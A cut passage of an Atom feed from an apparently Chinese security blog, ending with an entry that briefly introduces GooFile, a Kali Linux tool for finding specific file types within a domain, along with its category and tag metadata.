class="line">docs.kali.org/pdf/articles/kali-linux-live-usb-install-en.pdf</div><div class="line">====================</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-GOOFILE介绍0X00 GOOFILE介绍
视频介绍：https://asciinema.org/a/31264 [https://asciinema.org/a/31264]
使用此工具可以在给定的域中搜索特定的文件类型。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="goofile" scheme="https://hackfun.org/tags/goofile/"/>
    
  </entry>
  
</feed>
